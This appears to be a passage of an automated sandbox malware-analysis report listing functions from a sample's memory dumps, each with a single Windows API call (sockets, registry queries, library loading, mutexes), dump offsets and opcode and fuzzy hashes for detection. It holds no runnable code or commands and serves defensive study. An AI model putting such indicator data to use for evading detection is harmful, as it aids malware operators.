Function 05872B4A, Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 05872BCE

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 24e2d517ba3aa3c6bd4b3e37f3936a59c96275322919b5fff3801b5f2263e41e
Instruction ID: bd20466a2cda6ab6a30f8361b5354c5c71a4837ab2d62ccc01d91b6f9c6cc3e4
Opcode Fuzzy Hash: 24e2d517ba3aa3c6bd4b3e37f3936a59c96275322919b5fff3801b5f2263e41e
Instruction Fuzzy Hash: 222141B2405344AFD711CB65DC45F97BFACEF46310F0884ABEA459B152D264A548CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05872186, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 058721F9

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: b0450240951337ec8ded7e9b96c771f25c0a16bfe36ccb8ab1444134d40ed2ad
Instruction ID: ed16acb8000cb0ab8f1c10109c4bb2ff9aaf81189f16575d1087e0017f7dd9c7
Opcode Fuzzy Hash: b0450240951337ec8ded7e9b96c771f25c0a16bfe36ccb8ab1444134d40ed2ad
Instruction Fuzzy Hash: 0A21BBB5504244AFE720DF25CC84F6AFBE8EF04220F14846AEE8ACB251D770E904CA75

Uniqueness

Uniqueness Score: -1.00%

Function 0587298A, Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 05872A05

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 50600e604d14798b94934d1cb151fecb7a7bb54060e83a1e662df96312f4a075
Instruction ID: bee1ee0010272f77dfaa3ca8c5c7010cef832187c14b7ca7c191188ff1615c53
Opcode Fuzzy Hash: 50600e604d14798b94934d1cb151fecb7a7bb54060e83a1e662df96312f4a075
Instruction Fuzzy Hash: 58215775500608AEEB21CF55DC80FA6FBE8EF48710F18856AEE469A261D770E848CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05870C7A, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 05870D01

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 295075898ccbae97df8ba9bee12649f9aeafa099f412c1c2d25e65ad1690a4b4
Instruction ID: 56ba2fb168ae260c1d9e483e5b51002c08b993785698e4fe4af56fda9fc9a08f
Opcode Fuzzy Hash: 295075898ccbae97df8ba9bee12649f9aeafa099f412c1c2d25e65ad1690a4b4
Instruction Fuzzy Hash: E8219275409384AFE7128B25DC45F66BFB8EF47310F0881DBED849B193C264A948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 05870007, Relevance: 1.6, APIs: 1, Instructions: 70libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000E2C), ref: 0587009B

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8a03b1c05bdc845833e034710cedc97483c926b22dc361692bf956f236c84d62
Instruction ID: d7208b36bed302e39bac4257656a4d65a03f575dc793a76f1a816e5ea9d438a2
Opcode Fuzzy Hash: 8a03b1c05bdc845833e034710cedc97483c926b22dc361692bf956f236c84d62
Instruction Fuzzy Hash: 68210871005344AFE722CB14DC45FA6FFA8EF46320F14809AFE449B192D264A948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 05872CEA, Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05872D6E

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 7f9ba33a43e8eccac81e8ee899a6421e477f25a33e8f3d75cd62aa700539fe85
Instruction ID: 821dc9de012396cd12912569c94f8d9da4dc19a3fd4daf65cdf10c1b710546cd
Opcode Fuzzy Hash: 7f9ba33a43e8eccac81e8ee899a6421e477f25a33e8f3d75cd62aa700539fe85
Instruction Fuzzy Hash: 6E21AE75409384AFDB22CF61D844AA2BFF4EF06210F0984DAED858B123D371A909DB61

Uniqueness

Uniqueness Score: -1.00%

Function 05870B16, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 05870B88

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1eb1aadee763656279cd282b08f46bb709b3bcdb53afebc359edad73bafab3e8
Instruction ID: 1dddce503d37140bf3b340ca23b687616a70b9e3ca8ccb165c91fcbac218a4b1
Opcode Fuzzy Hash: 1eb1aadee763656279cd282b08f46bb709b3bcdb53afebc359edad73bafab3e8
Instruction Fuzzy Hash: 2B216DB1500204EEEB20CF55DC84F67BBA8EF44714F14886AEE45DB251D770E908CA71

Uniqueness

Uniqueness Score: -1.00%

Function 05871DE2, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 05871E4D

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: c4b222e740e92d54e900734e75225c593615669c9d32d84ae1c2ba39244ec43f
Instruction ID: ce9e58799d7bcaa42ffb15b3bdc6ffb7729d3018cf9efce4160011359e5e0b63
Opcode Fuzzy Hash: c4b222e740e92d54e900734e75225c593615669c9d32d84ae1c2ba39244ec43f
Instruction Fuzzy Hash: F221C0B2500204AFE720DF65DC89F66FBE8EF44320F14846AEE898B641D771E904CB72

Uniqueness

Uniqueness Score: -1.00%

Function 05871EE2, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 05871F56

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: b5da6a96027a0d936c62151f6b35f6e7211f3e7566acad7194e91e6eda7886d0
Instruction ID: fdbc59e5a094e330853133906782d1d480f09079b23e4687d3f91ae5eb726d99
Opcode Fuzzy Hash: b5da6a96027a0d936c62151f6b35f6e7211f3e7566acad7194e91e6eda7886d0
Instruction Fuzzy Hash: 6E21AE71500204AFE721DF15DD44FA6FBE8EF08320F14845AEE889B651D771E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0587182A, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32 ref: 05871896

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 91697fc7fad58c3ab40a9ad8812dda1a1dd6f1c3de22347c60d3167e308c583f
Instruction ID: bedb0634c5e12c2f546eeaa6c87bbc4122ef8f147dc1edb4c3cc0574153a839b
Opcode Fuzzy Hash: 91697fc7fad58c3ab40a9ad8812dda1a1dd6f1c3de22347c60d3167e308c583f
Instruction Fuzzy Hash: 3821CD71500204AFEB21DF65DC45F66FFE9EF08310F14856AEE858A651D371E808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05871B46, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 05871BB8

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 2fdbf384be441e02737782cf3b2410d08c244274e003d9a529e7eb687a6772b2
Instruction ID: d1939cb6c2b5447704b38a91b8b8746b95257493c8f2b5d6b341030a02497438
Opcode Fuzzy Hash: 2fdbf384be441e02737782cf3b2410d08c244274e003d9a529e7eb687a6772b2
Instruction Fuzzy Hash: EE119D71500608AEEB20CF55CC84F67BBE8EF45710F04845AEE45DA651E664E808CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05871630, Relevance: 1.6, APIs: 1, Instructions: 64networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 058716A8

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: d91ab82a9922a586679746dbba4aa03be21281c5e0da2e5b8d5846aec396af5f
Instruction ID: 585e96e5c3222c4b850afecb5c1aed4c3e7c2de9e93b02c22ad41d6841478518
Opcode Fuzzy Hash: d91ab82a9922a586679746dbba4aa03be21281c5e0da2e5b8d5846aec396af5f
Instruction Fuzzy Hash: F8119671509384AFEB118B15DC45F56FFB8EF46720F18809BEE449B252C264A948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05872456, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 058724B5

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: db319711232d647586dcf7095f587ab5d67a6ff731b15171a1464fd36f66176c
Instruction ID: 67277d0de7b3b56a4d0a29a4c8c0de77b405b1732d8514e35c2b2d3d9da69c39
Opcode Fuzzy Hash: db319711232d647586dcf7095f587ab5d67a6ff731b15171a1464fd36f66176c
Instruction Fuzzy Hash: 9711BE76500204AFEB21CF65DC44F6ABBA8EF44320F14846BEE46CA251D771A8088B71

Uniqueness

Uniqueness Score: -1.00%

Function 05872B6A, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 05872BCE

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 05606987898012317e0406e1bf7306a71d6600af621aa9f62a9accf90f9a6f1e
Instruction ID: 471a436b83c0ff1bdd93e0bfc52b341c3c2fde00e119fb9e3e3c6ddde81af798
Opcode Fuzzy Hash: 05606987898012317e0406e1bf7306a71d6600af621aa9f62a9accf90f9a6f1e
Instruction Fuzzy Hash: 0C1190B1400208AEEB21DF55DC84FA7FBACEF45320F14846BEE45DB241D674E9088B71

Uniqueness

Uniqueness Score: -1.00%

Function 05870D6E, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 05870DCD

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 63c46e7fb93ca5f1bec49731a7a5a0de37cf588cc6de3f2a9758cff6bebdf0f3
Instruction ID: f5f8ec0136bb0795c5025cc9273caba5d99d995a3b892d37ccc1ed7beac67903
Opcode Fuzzy Hash: 63c46e7fb93ca5f1bec49731a7a5a0de37cf588cc6de3f2a9758cff6bebdf0f3
Instruction Fuzzy Hash: 2A119D72400608EEEB21CF55DC44F6BFFA8EF44320F14856BEE459A251D275A9088BB2

Uniqueness

Uniqueness Score: -1.00%

Function 058728AE, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 05872907

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: e446841ecf4d95bdda76bb10e58f833330cb161d046e2e158a471b16a283b7c0
Instruction ID: 7b9dc07c5f7a08d53005b7403f39b720bfae10abe003ab8f89f67e5a3250ab1d
Opcode Fuzzy Hash: e446841ecf4d95bdda76bb10e58f833330cb161d046e2e158a471b16a283b7c0
Instruction Fuzzy Hash: F811A371404208AFEB21CF55DC44F6BFBA8EF45320F18846BEE499B251D774A904CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0587228E, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 058722E4

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: e04a8238ae190fc053a9512c35dca55c0928e89ea19dc2f6b66dc9e3d304f6ed
Instruction ID: c3b4af2c19932497a515c0e895e185610943ca3ff2abc183b8584eef39a98a2d
Opcode Fuzzy Hash: e04a8238ae190fc053a9512c35dca55c0928e89ea19dc2f6b66dc9e3d304f6ed
Instruction Fuzzy Hash: 6A11C271400248AFEB21CF15DC84F6AFB98EF45320F1484ABEE05DB251D774A904CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05871320, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?), ref: 05871374

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 2c1996dc703f798c97fed2c91ca83a1cf459d389bbc18f06cdeb8c9a85130a34
Instruction ID: 6d5155fa73b966dad5287b779f91feb571ec4f3e6ec0b00ac096a79083d76b83
Opcode Fuzzy Hash: 2c1996dc703f798c97fed2c91ca83a1cf459d389bbc18f06cdeb8c9a85130a34
Instruction Fuzzy Hash: 0511A771509384AFD7128F25DC44B56BFB4EF46220F0880DBED85CF652D2759908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 05870032, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000E2C), ref: 0587009B

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fc4ef10e3c6c4aa05614849ccb071feb8f8bff20a293851e02b779f301f25370
Instruction ID: e3bc1c1204e040f05aa3f63db41e77051caabadcb97a36c597f6417b10ec55e9
Opcode Fuzzy Hash: fc4ef10e3c6c4aa05614849ccb071feb8f8bff20a293851e02b779f301f25370
Instruction Fuzzy Hash: 6C11E171500208EFE720DB15DC85FB6FF98EF45720F14849AEE449B281E6B5A909CFB2

Uniqueness

Uniqueness Score: -1.00%

Function 05872C4E, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 05872CAD

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: b0d80f4105ad17381b748724806dbcc2df3072cebfb53e40687600a483129b8c
Instruction ID: eeb8a02874a86d8e512d32e21fb882b22f82c7c4e0722a8274332c1f16b26b2f
Opcode Fuzzy Hash: b0d80f4105ad17381b748724806dbcc2df3072cebfb53e40687600a483129b8c
Instruction Fuzzy Hash: 9D11E075400608EFEB208F15DC40F66FBA8EF54720F14855BEE459B251C370E909CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 05870BE2, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 05870C40

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: fa94355570e4066406f118f303f4aa980227df2758ad02354a22fe65ed11774f
Instruction ID: 368173e117c2c31d4e46b8d00b2155df095a85043f37bb851f2bee427c13df3c
Opcode Fuzzy Hash: fa94355570e4066406f118f303f4aa980227df2758ad02354a22fe65ed11774f
Instruction Fuzzy Hash: 1F1191755097849FD7128B25DC85B62BFF4EF46220F0C84DAED858F262D375A848CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05871652, Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 058716A8

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: f212916857ef4adab15d231b77cd9ca52502ac840018a0933bc3e6d96eb8dbbd
Instruction ID: 9a3cfd780bb30ae32ed27678703b9bdaf5182624bcbb0472e1b36e3540a65651
Opcode Fuzzy Hash: f212916857ef4adab15d231b77cd9ca52502ac840018a0933bc3e6d96eb8dbbd
Instruction Fuzzy Hash: C501E171504208AEEB20CB15DC84F67FBA8EF05324F18809BEE449B641D674A808CAB5

Uniqueness

Uniqueness Score: -1.00%

Function 05870CAE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E2C,41DA0E64,00000000,00000000,00000000,00000000), ref: 05870D01

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 4fde21ee77268ffeddd0d01bb86b8a4e7c8caad00c7cb6d6178b274f04cff58d
Instruction ID: 4a5afe8104844b9ce5f2e51542358c70fe037d30fee89ae2b3523ddb63035d1c
Opcode Fuzzy Hash: 4fde21ee77268ffeddd0d01bb86b8a4e7c8caad00c7cb6d6178b274f04cff58d
Instruction Fuzzy Hash: 59010075400308EEE720CB15DC88F66FF98EF45320F148097EE049B241D6B4A948CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 05872D22, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05872D6E

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 463bbe4b78c970ccdd32bd5152068205a9b79e886178bc768874a6096832875f
Instruction ID: 571d5ee01a72e6111c510556d03a71f8900b0d5fc0bff328c5c8d9cd19a83791
Opcode Fuzzy Hash: 463bbe4b78c970ccdd32bd5152068205a9b79e886178bc768874a6096832875f
Instruction Fuzzy Hash: B3115A755006089FDB20CF55D884B66FFE4EF48310F0885AAEE4A8B622D371E918DF62

Uniqueness

Uniqueness Score: -1.00%

Function 058715B6, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 05871606

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 15fd1f297ce4eefe73b6743564bcdbafaef99d5865937a16dc0aa3353cd24047
Instruction ID: 5f37be9fe97cf8323bf9f84d43483b064f8d1e0305c4c8ae88ac3273bfcd1c65
Opcode Fuzzy Hash: 15fd1f297ce4eefe73b6743564bcdbafaef99d5865937a16dc0aa3353cd24047
Instruction Fuzzy Hash: 65014B76500604ABD210DF16DC86F26FBA8EB88B20F14815AED085B741E771F916CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 0587192E, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 0587196C

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 275ae10c052baf7fc3211be0b8044c3fef4d619c19d5a63e492aab4ce7bcfe40
Instruction ID: be1266989695db9131651c4ae5b0246ab9beee78ee2d8aa001f97ce4b00246d5
Opcode Fuzzy Hash: 275ae10c052baf7fc3211be0b8044c3fef4d619c19d5a63e492aab4ce7bcfe40
Instruction Fuzzy Hash: 86018C71800608EFDB20CF55D888B66FFA0EF44320F0884AADE498B616D375E819DB72

Uniqueness

Uniqueness Score: -1.00%

Function 05871342, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?), ref: 05871374

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 50b916e6b1d45d11b760f35e8a33ddb1687e632231a7eaee77f8e0d8286323f9
Instruction ID: 9bf77a0a27d434e21361af940802210540717ee7cd8733cb5e8f3c638d6ea355
Opcode Fuzzy Hash: 50b916e6b1d45d11b760f35e8a33ddb1687e632231a7eaee77f8e0d8286323f9
Instruction Fuzzy Hash: 02018F719002489FDB10CF29D888766FFA4EF44224F18C4ABDD49CFA52D679E808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0587096E, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNELBASE(?,00000E2C,?,?), ref: 058709BE

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: fea435ed882b3abe950d54f50a5ee6eb918dcab8ad8bc01303641337dbb0f2ac
Instruction ID: 372631bba31b84c5da8c84e0801800c18c6dcbbdfa2c3cd0abde9fc8b257d8ef
Opcode Fuzzy Hash: fea435ed882b3abe950d54f50a5ee6eb918dcab8ad8bc01303641337dbb0f2ac
Instruction Fuzzy Hash: 7C014B76500604ABD250DF16DC86F26FBA8EB88B20F14815AED085B741E771F916CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 05870C0E, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?), ref: 05870C40

Memory Dump Source

Source File: 00000003.00000002.475891366.0000000005870000.00000040.00000001.sdmp, Offset: 05870000, based on PE: false

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 4085bb381869821bc8e611bde5a4c82db59e9d023d7e3ee34962ea757a4d4bb7
Instruction ID: 14aca4e1c3fabeba47a6ebdbfef85999c928c010bfaee44a61967d5f10c1b690
Opcode Fuzzy Hash: 4085bb381869821bc8e611bde5a4c82db59e9d023d7e3ee34962ea757a4d4bb7
Instruction Fuzzy Hash: 6A01D175500608DFDB10CF19D888766FFD4EF45324F08C0AADD498B652D2B5E808CE62

Uniqueness

Uniqueness Score: -1.00%

Function 05F45778, Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

X1kr, xrefs: 05F45F17

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID: X1kr
API String ID: 0-844551562
Opcode ID: 8639a0bed4199fb702868e51f19ad3f52a6e018f35c72d91389eaf4b5911f782
Instruction ID: 00f3a285b2c3f1755b4560552560aa14507a6f4ea5bbdbc5e8995f64b0c12006
Opcode Fuzzy Hash: 8639a0bed4199fb702868e51f19ad3f52a6e018f35c72d91389eaf4b5911f782
Instruction Fuzzy Hash: 8E51017AE002488FDB10DFA9C884AAEBBB6EB84320F14C5AAE408D7351C679DD41CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05F45BB6, Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

X1kr, xrefs: 05F45BFB

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID: X1kr
API String ID: 0-844551562
Opcode ID: 445e1c85dd3127b7546b2bee0576196a8d91ba4184a5cfc8b4e9f12685e23ec8
Instruction ID: ab09eac2bc40675fce0fadf791854eac3516ec32b5835d97c0f5ee2352769306
Opcode Fuzzy Hash: 445e1c85dd3127b7546b2bee0576196a8d91ba4184a5cfc8b4e9f12685e23ec8
Instruction Fuzzy Hash: C0F0CD71B403149BD758EBB54C50B6EB9D7AFC5704F19C029D6069F2C1EE349C428762

Uniqueness

Uniqueness Score: -1.00%

Function 05F45A73, Relevance: 1.3, Strings: 1, Instructions: 18COMMON

Download Yara Rule

Strings

:@Dr, xrefs: 05F45A99

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID: :@Dr
API String ID: 0-3830894600
Opcode ID: 9820b3d66068b9caa46ad818ff5cd1035f169576f8dffaa2b06952ab524d0c84
Instruction ID: d13fa3b497e057e9e794f93f7a4c97cf173b62bfb6acd6e2aee571f21b460e79
Opcode Fuzzy Hash: 9820b3d66068b9caa46ad818ff5cd1035f169576f8dffaa2b06952ab524d0c84
Instruction Fuzzy Hash: 51E08670F04148CFCB44EF78C89069E7FA67F45308F14C068D1165B356DE6468138F85

Uniqueness

Uniqueness Score: -1.00%

Function 05F4D870, Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c84280f7d54e510cf1f01e5f4fc6028990373cd51e905d871918530be82f3bdb
Instruction ID: d3b9a35361ba45590b676980a6483cb103df02463ca3f5622603f59bbec33b21
Opcode Fuzzy Hash: c84280f7d54e510cf1f01e5f4fc6028990373cd51e905d871918530be82f3bdb
Instruction Fuzzy Hash: D6B12E70F002459BDB48EBB8D56466EBBF7AF88700F158429E506EB384DF78DD428B85

Uniqueness

Uniqueness Score: -1.00%

Function 05F42A82, Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8359c79822d045e2541d11e03af84debabec679a31f6c75e3bfc4408cf46c97e
Instruction ID: 3d933caeac3e90344f4a9d66a5354d77bdad5208cc68e589dbc7112e708dfd04
Opcode Fuzzy Hash: 8359c79822d045e2541d11e03af84debabec679a31f6c75e3bfc4408cf46c97e
Instruction Fuzzy Hash: F771A836C04A69AEDB62CF64CC406CAB7B3FF49340F0544D5EA4CBB124D6B26AD98F41

Uniqueness

Uniqueness Score: -1.00%

Function 05F4A710, Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48e5a8f918f97d2850d724a0533a8f952d60b172176a97f99e4c32958e9e7f70
Instruction ID: 8b4709ae6f758c98496637150c909cd776ce51948b0392671198ede376821b57
Opcode Fuzzy Hash: 48e5a8f918f97d2850d724a0533a8f952d60b172176a97f99e4c32958e9e7f70
Instruction Fuzzy Hash: F9619134B002148FDB18EBB8D4506AEBBE7ABC8315F158579E516E7384EF34AC428B91

Uniqueness

Uniqueness Score: -1.00%

Function 05F4ABE8, Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.476097593.0000000005F40000.00000040.00000001.sdmp, Offset: 05F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 994cd469b081d4dbdea4594a9b077936c8f0a6e67c769da6a49c5fef804815f1
